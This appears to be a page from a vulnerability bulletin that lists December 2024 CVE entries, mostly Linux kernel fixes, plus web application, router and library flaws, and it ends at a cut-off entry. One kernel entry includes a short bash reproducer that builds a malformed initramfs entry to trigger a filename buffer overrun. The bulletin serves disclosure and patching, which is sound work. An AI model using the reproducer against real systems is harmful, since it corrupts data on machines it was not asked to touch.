In the Linux kernel, the following vulnerability has been resolved: Revert "mmc: dw_mmc: Fix IDMAC operation with pages bigger than 4K" The commit 8396c793ffdf ("mmc: dw_mmc: Fix IDMAC operation with pages bigger than 4K") increased the max_req_size, even for 4K pages, causing various issues: - Panic booting the kernel/rootfs from an SD card on Rockchip RK3566 - Panic booting the kernel/rootfs from an SD card on StarFive JH7100 - "swiotlb buffer is full" and data corruption on StarFive JH7110 At this stage no fix have been found, so it's probably better to just revert the change. This reverts commit 8396c793ffdf28bb8aee7cfe0891080f8cab7890. | 2024-12-04 | not yet calculated | CVE-2024-53127 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sched/task_stack: fix object_is_on_stack() for KASAN tagged pointers When CONFIG_KASAN_SW_TAGS and CONFIG_KASAN_STACK are enabled, the object_is_on_stack() function may produce incorrect results due to the presence of tags in the obj pointer, while the stack pointer does not have tags. This discrepancy can lead to incorrect stack object detection and subsequently trigger warnings if CONFIG_DEBUG_OBJECTS is also enabled. Example of the warning: ODEBUG: object 3eff800082ea7bb0 is NOT on stack ffff800082ea0000, but annotated. ------------[ cut here ]------------ WARNING: CPU: 0 PID: 1 at lib/debugobjects.c:557 __debug_object_init+0x330/0x364 Modules linked in: CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.12.0-rc5 #4 Hardware name: linux,dummy-virt (DT) pstate: 600000c5 (nZCv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __debug_object_init+0x330/0x364 lr : __debug_object_init+0x330/0x364 sp : ffff800082ea7b40 x29: ffff800082ea7b40 x28: 98ff0000c0164518 x27: 98ff0000c0164534 x26: ffff800082d93ec8 x25: 0000000000000001 x24: 1cff0000c00172a0 x23: 0000000000000000 x22: ffff800082d93ed0 x21: ffff800081a24418 x20: 3eff800082ea7bb0 x19: efff800000000000 x18: 0000000000000000 x17: 00000000000000ff x16: 0000000000000047 x15: 206b63617473206e x14: 0000000000000018 x13: ffff800082ea7780 x12: 0ffff800082ea78e x11: 0ffff800082ea790 x10: 0ffff800082ea79d x9 : 34d77febe173e800 x8 : 34d77febe173e800 x7 : 0000000000000001 x6 : 0000000000000001 x5 : feff800082ea74b8 x4 : ffff800082870a90 x3 : ffff80008018d3c4 x2 : 0000000000000001 x1 : ffff800082858810 x0 : 0000000000000050 Call trace: __debug_object_init+0x330/0x364 debug_object_init_on_stack+0x30/0x3c schedule_hrtimeout_range_clock+0xac/0x26c schedule_hrtimeout+0x1c/0x30 wait_task_inactive+0x1d4/0x25c kthread_bind_mask+0x28/0x98 init_rescuer+0x1e8/0x280 workqueue_init+0x1a0/0x3cc kernel_init_freeable+0x118/0x200 kernel_init+0x28/0x1f0 ret_from_fork+0x10/0x20 ---[ end trace 0000000000000000 ]--- ODEBUG: object 3eff800082ea7bb0 is NOT on stack ffff800082ea0000, but annotated. ------------[ cut here ]------------ | 2024-12-04 | not yet calculated | CVE-2024-53128 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/rockchip: vop: Fix a dereferenced before check warning The 'state' can't be NULL, we should check crtc_state. Fix warning: drivers/gpu/drm/rockchip/rockchip_drm_vop.c:1096 vop_plane_atomic_async_check() warn: variable dereferenced before check 'state' (see line 1077) | 2024-12-04 | not yet calculated | CVE-2024-53129 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix null-ptr-deref in block_dirty_buffer tracepoint When using the "block:block_dirty_buffer" tracepoint, mark_buffer_dirty() may cause a NULL pointer dereference, or a general protection fault when KASAN is enabled. This happens because, since the tracepoint was added in mark_buffer_dirty(), it references the dev_t member bh->b_bdev->bd_dev regardless of whether the buffer head has a pointer to a block_device structure. In the current implementation, nilfs_grab_buffer(), which grabs a buffer to read (or create) a block of metadata, including b-tree node blocks, does not set the block device, but instead does so only if the buffer is not in the "uptodate" state for each of its caller block reading functions. However, if the uptodate flag is set on a folio/page, and the buffer heads are detached from it by try_to_free_buffers(), and new buffer heads are then attached by create_empty_buffers(), the uptodate flag may be restored to each buffer without the block device being set to bh->b_bdev, and mark_buffer_dirty() may be called later in that state, resulting in the bug mentioned above. Fix this issue by making nilfs_grab_buffer() always set the block device of the super block structure to the buffer head, regardless of the state of the buffer's uptodate flag. | 2024-12-04 | not yet calculated | CVE-2024-53130 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix null-ptr-deref in block_touch_buffer tracepoint Patch series "nilfs2: fix null-ptr-deref bugs on block tracepoints". This series fixes null pointer dereference bugs that occur when using nilfs2 and two block-related tracepoints. This patch (of 2): It has been reported that when using "block:block_touch_buffer" tracepoint, touch_buffer() called from __nilfs_get_folio_block() causes a NULL pointer dereference, or a general protection fault when KASAN is enabled. This happens because since the tracepoint was added in touch_buffer(), it references the dev_t member bh->b_bdev->bd_dev regardless of whether the buffer head has a pointer to a block_device structure. In the current implementation, the block_device structure is set after the function returns to the caller. Here, touch_buffer() is used to mark the folio/page that owns the buffer head as accessed, but the common search helper for folio/page used by the caller function was optimized to mark the folio/page as accessed when it was reimplemented a long time ago, eliminating the need to call touch_buffer() here in the first place. So this solves the issue by eliminating the touch_buffer() call itself. | 2024-12-04 | not yet calculated | CVE-2024-53131 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/xe/oa: Fix "Missing outer runtime PM protection" warning Fix the following drm_WARN: [953.586396] xe 0000:00:02.0: [drm] Missing outer runtime PM protection ... <4> [953.587090] ? xe_pm_runtime_get_noresume+0x8d/0xa0 [xe] <4> [953.587208] guc_exec_queue_add_msg+0x28/0x130 [xe] <4> [953.587319] guc_exec_queue_fini+0x3a/0x40 [xe] <4> [953.587425] xe_exec_queue_destroy+0xb3/0xf0 [xe] <4> [953.587515] xe_oa_release+0x9c/0xc0 [xe] (cherry picked from commit b107c63d2953907908fd0cafb0e543b3c3167b75) | 2024-12-04 | not yet calculated | CVE-2024-53132 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Handle dml allocation failure to avoid crash [Why] In the case where a dml allocation fails for any reason, the current state's dml contexts would no longer be valid. Then subsequent calls dc_state_copy_internal would shallow copy invalid memory and if the new state was released, a double free would occur. [How] Reset dml pointers in new_state to NULL and avoid invalid pointer (cherry picked from commit bcafdc61529a48f6f06355d78eb41b3aeda5296c) | 2024-12-04 | not yet calculated | CVE-2024-53133 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: pmdomain: imx93-blk-ctrl: correct remove path The check condition should be 'i < bc->onecell_data.num_domains', not 'bc->onecell_data.num_domains' which will make the look never finish and cause kernel panic. Also disable runtime to address "imx93-blk-ctrl 4ac10000.system-controller: Unbalanced pm_runtime_enable!" | 2024-12-04 | not yet calculated | CVE-2024-53134 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: KVM: VMX: Bury Intel PT virtualization (guest/host mode) behind CONFIG_BROKEN Hide KVM's pt_mode module param behind CONFIG_BROKEN, i.e. disable support for virtualizing Intel PT via guest/host mode unless BROKEN=y. There are myriad bugs in the implementation, some of which are fatal to the guest, and others which put the stability and health of the host at risk. For guest fatalities, the most glaring issue is that KVM fails to ensure tracing is disabled, and *stays* disabled prior to VM-Enter, which is necessary as hardware disallows loading (the guest's) RTIT_CTL if tracing is enabled (enforced via a VMX consistency check). Per the SDM: If the logical processor is operating with Intel PT enabled (if IA32_RTIT_CTL.TraceEn = 1) at the time of VM entry, the "load IA32_RTIT_CTL" VM-entry control must be 0. On the host side, KVM doesn't validate the guest CPUID configuration provided by userspace, and even worse, uses the guest configuration to decide what MSRs to save/load at VM-Enter and VM-Exit. E.g. configuring guest CPUID to enumerate more address ranges than are supported in hardware will result in KVM trying to passthrough, save, and load non-existent MSRs, which generates a variety of WARNs, ToPA ERRORs in the host, a potential deadlock, etc. | 2024-12-04 | not yet calculated | CVE-2024-53135 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: revert "mm: shmem: fix data-race in shmem_getattr()" Revert d949d1d14fa2 ("mm: shmem: fix data-race in shmem_getattr()") as suggested by Chuck [1]. It is causing deadlocks when accessing tmpfs over NFS. As Hugh commented, "added just to silence a syzbot sanitizer splat: added where there has never been any practical problem". | 2024-12-04 | not yet calculated | CVE-2024-53136 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ARM: fix cacheflush with PAN It seems that the cacheflush syscall got broken when PAN for LPAE was implemented. User access was not enabled around the cache maintenance instructions, causing them to fault. | 2024-12-04 | not yet calculated | CVE-2024-53137 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: kTLS, Fix incorrect page refcounting The kTLS tx handling code is using a mix of get_page() and page_ref_inc() APIs to increment the page reference. But on the release path (mlx5e_ktls_tx_handle_resync_dump_comp()), only put_page() is used. This is an issue when using pages from large folios: the get_page() references are stored on the folio page while the page_ref_inc() references are stored directly in the given page. On release the folio page will be dereferenced too many times. This was found while doing kTLS testing with sendfile() + ZC when the served file was read from NFS on a kernel with NFS large folios support (commit 49b29a573da8 ("nfs: add support for large folios")). | 2024-12-04 | not yet calculated | CVE-2024-53138 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sctp: fix possible UAF in sctp_v6_available() A lockdep report [1] with CONFIG_PROVE_RCU_LIST=y hints that sctp_v6_available() is calling dev_get_by_index_rcu() and ipv6_chk_addr() without holding rcu. [1] ============================= WARNING: suspicious RCU usage 6.12.0-rc5-virtme #1216 Tainted: G W ----------------------------- net/core/dev.c:876 RCU-list traversed in non-reader section!! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 1 lock held by sctp_hello/31495: #0: ffff9f1ebbdb7418 (sk_lock-AF_INET6){+.+.}-{0:0}, at: sctp_bind (./arch/x86/include/asm/jump_label.h:27 net/sctp/socket.c:315) sctp stack backtrace: CPU: 7 UID: 0 PID: 31495 Comm: sctp_hello Tainted: G W 6.12.0-rc5-virtme #1216 Tainted: [W]=WARN Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Call Trace: <TASK> dump_stack_lvl (lib/dump_stack.c:123) lockdep_rcu_suspicious (kernel/locking/lockdep.c:6822) dev_get_by_index_rcu (net/core/dev.c:876 (discriminator 7)) sctp_v6_available (net/sctp/ipv6.c:701) sctp sctp_do_bind (net/sctp/socket.c:400 (discriminator 1)) sctp sctp_bind (net/sctp/socket.c:320) sctp inet6_bind_sk (net/ipv6/af_inet6.c:465) ? security_socket_bind (security/security.c:4581 (discriminator 1)) __sys_bind (net/socket.c:1848 net/socket.c:1869) ? do_user_addr_fault (./include/linux/rcupdate.h:347 ./include/linux/rcupdate.h:880 ./include/linux/mm.h:729 arch/x86/mm/fault.c:1340) ? do_user_addr_fault (./arch/x86/include/asm/preempt.h:84 (discriminator 13) ./include/linux/rcupdate.h:98 (discriminator 13) ./include/linux/rcupdate.h:882 (discriminator 13) ./include/linux/mm.h:729 (discriminator 13) arch/x86/mm/fault.c:1340 (discriminator 13)) __x64_sys_bind (net/socket.c:1877 (discriminator 1) net/socket.c:1875 (discriminator 1) net/socket.c:1875 (discriminator 1)) do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) RIP: 0033:0x7f59b934a1e7 Code: 44 00 00 48 8b 15 39 8c 0c 00 f7 d8 64 89 02 b8 ff ff ff ff eb bd 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b8 31 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 09 8c 0c 00 f7 d8 64 89 01 48 All code ======== 0: 44 00 00 add %r8b,(%rax) 3: 48 8b 15 39 8c 0c 00 mov 0xc8c39(%rip),%rdx # 0xc8c43 a: f7 d8 neg %eax c: 64 89 02 mov %eax,%fs:(%rdx) f: b8 ff ff ff ff mov $0xffffffff,%eax 14: eb bd jmp 0xffffffffffffffd3 16: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1) 1d: 00 00 00 20: 0f 1f 00 nopl (%rax) 23: b8 31 00 00 00 mov $0x31,%eax 28: 0f 05 syscall 2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction 30: 73 01 jae 0x33 32: c3 ret 33: 48 8b 0d 09 8c 0c 00 mov 0xc8c09(%rip),%rcx # 0xc8c43 3a: f7 d8 neg %eax 3c: 64 89 01 mov %eax,%fs:(%rcx) 3f: 48 rex.W Code starting with the faulting instruction =========================================== 0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax 6: 73 01 jae 0x9 8: c3 ret 9: 48 8b 0d 09 8c 0c 00 mov 0xc8c09(%rip),%rcx # 0xc8c19 10: f7 d8 neg %eax 12: 64 89 01 mov %eax,%fs:(%rcx) 15: 48 rex.W RSP: 002b:00007ffe2d0ad398 EFLAGS: 00000202 ORIG_RAX: 0000000000000031 RAX: ffffffffffffffda RBX: 00007ffe2d0ad3d0 RCX: 00007f59b934a1e7 RDX: 000000000000001c RSI: 00007ffe2d0ad3d0 RDI: 0000000000000005 RBP: 0000000000000005 R08: 1999999999999999 R09: 0000000000000000 R10: 00007f59b9253298 R11: 000000000000 ---truncated--- | 2024-12-04 | not yet calculated | CVE-2024-53139 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netlink: terminate outstanding dump on socket close Netlink supports iterative dumping of data. It provides the families the following ops: - start - (optional) kicks off the dumping process - dump - actual dump helper, keeps getting called until it returns 0 - done - (optional) pairs with .start, can be used for cleanup The whole process is asynchronous and the repeated calls to .dump don't actually happen in a tight loop, but rather are triggered in response to recvmsg() on the socket. This gives the user full control over the dump, but also means that the user can close the socket without getting to the end of the dump. To make sure .start is always paired with .done we check if there is an ongoing dump before freeing the socket, and if so call .done. The complication is that sockets can get freed from BH and .done is allowed to sleep. So we use a workqueue to defer the call, when needed. Unfortunately this does not work correctly. What we defer is not the cleanup but rather releasing a reference on the socket. We have no guarantee that we own the last reference, if someone else holds the socket they may release it in BH and we're back to square one. The whole dance, however, appears to be unnecessary. Only the user can interact with dumps, so we can clean up when socket is closed. And close always happens in process context. Some async code may still access the socket after close, queue notification skbs to it etc. but no dumps can start, end or otherwise make progress. Delete the workqueue and flush the dump state directly from the release handler. Note that further cleanup is possible in -next, for instance we now always call .done before releasing the main module reference, so dump doesn't have to take a reference of its own. | 2024-12-04 | not yet calculated | CVE-2024-53140 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netfilter: ipset: add missing range check in bitmap_ip_uadt When tb[IPSET_ATTR_IP_TO] is not present but tb[IPSET_ATTR_CIDR] exists, the values of ip and ip_to are slightly swapped. Therefore, the range check for ip should be done later, but this part is missing and it seems that the vulnerability occurs. So we should add missing range checks and remove unnecessary range checks. | 2024-12-06 | not yet calculated | CVE-2024-53141 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: initramfs: avoid filename buffer overrun The initramfs filename field is defined in Documentation/driver-api/early-userspace/buffer-format.rst as: 37 cpio_file := ALGN(4) + cpio_header + filename + "\0" + ALGN(4) + data ... 55 ============= ================== ========================= 56 Field name Field size Meaning 57 ============= ================== ========================= ... 70 c_namesize 8 bytes Length of filename, including final \0 When extracting an initramfs cpio archive, the kernel's do_name() path handler assumes a zero-terminated path at @collected, passing it directly to filp_open() / init_mkdir() / init_mknod(). If a specially crafted cpio entry carries a non-zero-terminated filename and is followed by uninitialized memory, then a file may be created with trailing characters that represent the uninitialized memory. The ability to create an initramfs entry would imply already having full control of the system, so the buffer overrun shouldn't be considered a security vulnerability. Append the output of the following bash script to an existing initramfs and observe any created /initramfs_test_fname_overrunAA* path. E.g. ./reproducer.sh | gzip >> /myinitramfs It's easiest to observe non-zero uninitialized memory when the output is gzipped, as it'll overflow the heap allocated @out_buf in __gunzip(), rather than the initrd_start+initrd_size block. ---- reproducer.sh ---- nilchar="A" # change to "\0" to properly zero terminate / pad magic="070701" ino=1 mode=$(( 0100777 )) uid=0 gid=0 nlink=1 mtime=1 filesize=0 devmajor=0 devminor=1 rdevmajor=0 rdevminor=0 csum=0 fname="initramfs_test_fname_overrun" namelen=$(( ${#fname} + 1 )) # plus one to account for terminator printf "%s%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%s" \ $magic $ino $mode $uid $gid $nlink $mtime $filesize \ $devmajor $devminor $rdevmajor $rdevminor $namelen $csum $fname termpadlen=$(( 1 + ((4 - ((110 + $namelen) & 3)) % 4) )) printf "%.s${nilchar}" $(seq 1 $termpadlen) ---- reproducer.sh ---- Symlink filename fields handled in do_symlink() won't overrun past the data segment, due to the explicit zero-termination of the symlink target. Fix filename buffer overrun by aborting the initramfs FSM if any cpio entry doesn't carry a zero-terminator at the expected (name_len - 1) offset. | 2024-12-06 | not yet calculated | CVE-2024-53142 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: fsnotify: Fix ordering of iput() and watched_objects decrement Ensure the superblock is kept alive until we're done with iput(). Holding a reference to an inode is not allowed unless we ensure the superblock stays alive, which fsnotify does by keeping the watched_objects count elevated, so iput() must happen before the watched_objects decrement. This can lead to a UAF of something like sb->s_fs_info in tmpfs, but the UAF is hard to hit because race orderings that oops are more likely, thanks to the CHECK_DATA_CORRUPTION() block in generic_shutdown_super(). Also, ensure that fsnotify_put_sb_watched_objects() doesn't call fsnotify_sb_watched_objects() on a superblock that may have already been freed, which would cause a UAF read of sb->s_fsnotify_info. | 2024-12-07 | not yet calculated | CVE-2024-53143 |
| n/a--n/a |
whapa v1.59 is vulnerable to Command Injection via a crafted filename to the HTML reports component. | 2024-12-05 | not yet calculated | CVE-2024-53442 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the Device Settings section of LibreNMS v24.9.0 to v24.10.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name parameter. | 2024-12-05 | not yet calculated | CVE-2024-53457 |
| n/a--n/a |
Multiple stored cross-site scripting (XSS) vulnerabilities in the component /configuracao/gateway_pagamento.php of WeGIA v3.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the id or name parameter. | 2024-12-05 | not yet calculated | CVE-2024-53470 |
| n/a--n/a |
Multiple stored cross-site scripting (XSS) vulnerabilities in the component /configuracao/meio_pagamento.php of WeGIA v3.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the id or name parameter. | 2024-12-05 | not yet calculated | CVE-2024-53471 |
| n/a--n/a |
WeGIA v3.2.0 was discovered to contain a Cross-Site Request Forgery (CSRF). | 2024-12-05 | not yet calculated | CVE-2024-53472 |
| n/a--n/a |
WeGIA 3.2.0 before 3998672 does not verify permission to change a password. | 2024-12-07 | not yet calculated | CVE-2024-53473 |
| n/a--n/a |
JFinal CMS 5.1.0 is vulnerable to Command Execution via unauthorized execution of deserialization in the file ApiForm.java | 2024-12-02 | not yet calculated | CVE-2024-53477 |
| n/a--n/a |
Favorites-web 1.3.0 favorites-web has a directory traversal vulnerability in SecurityFilter.java. | 2024-12-05 | not yet calculated | CVE-2024-53490 |
| n/a--n/a |
JSFinder commit d70ab9bc5221e016c08cffaf0d9ac79646c90645 is vulnerable to Directory Traversal in the find_by_file function. | 2024-12-05 | not yet calculated | CVE-2024-53523 |
| n/a--n/a |
GNU objdump 2.43 is vulnerable to Buffer Overflow in the BFD (Binary File Descriptor) library's handling of tekhex format files. | 2024-12-05 | not yet calculated | CVE-2024-53589 |
| QNAP Systems Inc.--QTS |
A link following vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained user access to traverse the file system to unintended locations. We have already fixed the vulnerability in the following versions: QTS 5.1.8.2823 build 20240712 and later QTS 5.2.0.2802 build 20240620 and later QuTS hero h5.1.8.2823 build 20240712 and later QuTS hero h5.2.0.2802 build 20240620 and later | 2024-12-06 | not yet calculated | CVE-2024-53691 |
| argoproj--argo-workflows |
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication & authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint's fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13. | 2024-12-02 | not yet calculated | CVE-2024-53862 |
| element-hq--synapse |
Synapse is an open-source Matrix homeserver. In Synapse versions before 1.120.1, enabling the dynamic_thumbnails option or processing a specially crafted request could trigger the decoding and thumbnail generation of uncommon image formats, potentially invoking external tools like Ghostscript for processing. This significantly expands the attack surface in a historically vulnerable area, presenting a risk that far outweighs the benefit, particularly since these formats are rarely used on the open web or within the Matrix ecosystem. Synapse 1.120.1 addresses the issue by restricting thumbnail generation to images in the following widely used formats: PNG, JPEG, GIF, and WebP. This vulnerability is fixed in 1.120.1. | 2024-12-03 | not yet calculated | CVE-2024-53863 |
| ZOO-Project--ZOO-Project |
ZOO-Project is a C-based WPS (Web Processing Service) implementation. A path traversal vulnerability was discovered in Zoo-Project Echo example. The Echo example available by default in Zoo installs implements file caching, which can be controlled by user-given parameters. No input validation is performed in this parameter, which allows an attacker to fully control the file which is returned in the response. Patch was committed in November 22nd, 2024. | 2024-12-04 | not yet calculated | CVE-2024-53982 |
| rails--rails-html-sanitizer |
rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. There is a possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0 and Nokogiri < 1.15.7, or 1.16.x < 1.16.8. The XSS vulnerability with certain configurations of Rails::HTML::Sanitizer may allow an attacker to inject content if HTML5 sanitization is enabled and the application developer has overridden the sanitizer's allowed tags with both "math" and "style" elements or both both "svg" and "style" elements. This vulnerability is fixed in 1.6.1. | 2024-12-02 | not yet calculated | CVE-2024-53985 |
| rails--rails-html-sanitizer |
rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. There is a possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0. A possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer may allow an attacker to inject content if HTML5 sanitization is enabled and the application developer has overridden the sanitizer's allowed tags where the "math" and "style" elements are both explicitly allowed. This vulnerability is fixed in 1.6.1. | 2024-12-02 | not yet calculated | CVE-2024-53986 |
| rails--rails-html-sanitizer |
rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. There is a possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0. A possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer may allow an attacker to inject content if HTML5 sanitization is enabled and the application developer has overridden the sanitizer's allowed tags where the "style" element is explicitly allowed and the "svg" or "math" element is not allowed. This vulnerability is fixed in 1.6.1. | 2024-12-02 | not yet calculated | CVE-2024-53987 |
| rails--rails-html-sanitizer |
rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. There is a possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0. A possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer may allow an attacker to inject content if HTML5 sanitization is enabled and the application developer has overridden the sanitizer's allowed tags where the "math", "mtext", "table", and "style" elements are allowed and either either "mglyph" or "malignmark" are allowed. This vulnerability is fixed in 1.6.1. | 2024-12-02 | not yet calculated | CVE-2024-53988 |
| rails--rails-html-sanitizer |
rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. There is a possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0. A possible XSS vulnerability with certain configurations of Rails::HTML::Sanitizer may allow an attacker to inject content if HTML5 sanitization is enabled and the application developer has overridden the sanitizer's allowed tags for the the "noscript" element. This vulnerability is fixed in 1.6.1. | 2024-12-02 | not yet calculated | CVE-2024-53989 |
| AsyncHttpClient--async-http-client |
The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. When making any HTTP request, the automatically enabled and self-managed CookieStore (aka cookie jar) will silently replace explicitly defined Cookies with any that have the same name from the cookie jar. For services that operate with multiple users, this can result in one user's Cookie being used for another user's requests. | 2024-12-02 | not yet calculated | CVE-2024-53990 |
| EDM115--unzip-bot |
unzip-bot is a Telegram bot to extract various types of archives. Users could exploit unsanitized inputs to inject malicious commands that are executed through subprocess.Popen with shell=True. Attackers can exploit this vulnerability using a crafted archive name, password, or video name. This vulnerability is fixed in 7.0.3a. | 2024-12-02 | not yet calculated | CVE-2024-53992 |
| SKYLARK HOLDINGS CO., LTD.--'Skylark' App for Android |
Improper authorization in handler for custom URL scheme issue in 'Skylark' App for Android 6.2.13 and earlier and 'Skylark' App for iOS 6.2.13 and earlier allows an attacker to lead the application to access an arbitrary web site via another application installed on the user's device. | 2024-12-05 | not yet calculated | CVE-2024-54014 |
| TP-Link--Archer C50 Wireless Router |
This vulnerability exists in the TP-Link Archer C50 due to improper signature verification mechanism in the firmware upgrade process at its web interface. An attacker with administrative privileges within the router's Wi-Fi range could exploit this vulnerability by uploading and executing malicious firmware which could lead to complete compromise of the targeted device. | 2024-12-05 | not yet calculated | CVE-2024-54126 |
| TP-Link--Archer C50 Wireless Router |
This vulnerability exists in the TP-Link Archer C50 due to presence of terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by accessing the UART shell on the vulnerable device. Successful exploitation of this vulnerability could allow the attacker to obtain Wi-Fi credentials of the targeted system. | 2024-12-05 | not yet calculated | CVE-2024-54127 |
| nasa-jpl--ION-DTN |
The NASA's Interplanetary Overlay Network (ION) is an implementation of Delay/Disruption Tolerant Networking (DTN). A vulnerability exists in the version ION-DTN BPv7 implementation version 4.1.3 when receiving a bundle with an improper reference to the imc scheme with valid Service-Specific Part (SSP) in their Previous Node Block. The vulnerability can cause ION to become unresponsive. This vulnerability is fixed in 4.1.3s. | 2024-12-05 | not yet calculated | CVE-2024-54129 |
| nasa-jpl--ION-DTN |
The NASA's Interplanetary Overlay Network (ION) is an implementation of Delay/Disruption Tolerant Networking (DTN). A segmentation fault occurs with ION-DTN BPv7 software version 4.1.3 when a bundle with a Destination Endpoint ID (EID) set to dtn:none is received. This causes the node to become unresponsive to incoming bundles, leading to a Denial of Service (DoS) condition. This vulnerability is fixed in 4.1.3s. | 2024-12-05 | not yet calculated | CVE-2024-54130 |
| kolide--launcher |
The Kolide Agent (aka: Launcher) is the lightweight agent designed to work with Kolide's service. An implementation bug in the Kolide Agent (known as `launcher`) allows for local privilege escalation to the SYSTEM user on Windows 10 and 11. The bug was introduced in version 1.5.3 when launcher started storing upgraded binaries in the ProgramData directory. This move to the new directory meant the launcher root directory inherited default permissions that are not as strict as the previous location. These incorrect default permissions in conjunction with an omitted SystemDrive environmental variable (when launcher starts osqueryd), allows a malicious actor with access to the local Windows device to successfully place an arbitrary DLL into the osqueryd process's search path. Under some circumstances, this DLL will be executed when osqueryd performs a WMI query. This combination of events could then allow the attacker to escalate their privileges to SYSTEM. Impacted versions include versions >= 1.5.3 and the fix has been released in 1.12.3. | 2024-12-03 | not yet calculated | CVE-2024-54131 |
| cli--cli |
The GitHub CLI is GitHub's official command line tool. A security vulnerability has been identified in GitHub CLI that could create or overwrite files in unintended directories when users download a malicious GitHub Actions workflow artifact through gh run download. This vulnerability stems from a GitHub Actions workflow artifact named .. when downloaded using gh run download. The artifact name and --dir flag are used to determine the artifact's download path. When the artifact is named .., the resulting files within the artifact are extracted exactly 1 directory higher than the specified --dir flag value. This vulnerability is fixed in 2.63.1. | 2024-12-04 | not yet calculated | CVE-2024-54132 |
| solana-labs--solana-web3.js |
A publish-access account was compromised for `@solana/web3.js`, a JavaScript library that is commonly used by Solana dapps. This allowed an attacker to publish unauthorized and malicious packages that were modified, allowing them to steal private key material and drain funds from dapps, like bots, that handle private keys directly. This issue should not affect non-custodial wallets, as they generally do not expose private keys during transactions. This is not an issue with the Solana protocol itself, but with a specific JavaScript client library and only appears to affect projects that directly handle private keys and that updated within the window of 3:20pm UTC and 8:25pm UTC on Tuesday, December 3, 2024. These two unauthorized versions (1.95.6 and 1.95.7) were caught within hours and have since been unpublished. All Solana app developers should upgrade to version 1.95.8. Developers that suspect they might be compromised should rotate any suspect authority keys, including multisigs, program authorities, server keypairs, and so on. | 2024-12-04 | not yet calculated | CVE-2024-54134 |
| NuGet--NuGetGallery |
NuGet Gallery is a package repository that powers nuget.org. The NuGetGallery has a security vulnerability related to its handling of autolinks in Markdown content. While the platform properly filters out JavaScript from standard links, it does not adequately sanitize autolinks. This oversight allows attackers to exploit autolinks as a vector for Cross-Site Scripting (XSS) attacks. This vulnerability is fixed in 2024.12.06. | 2024-12-06 | not yet calculated | CVE-2024-54138 |
| sigstore--sigstore-java |
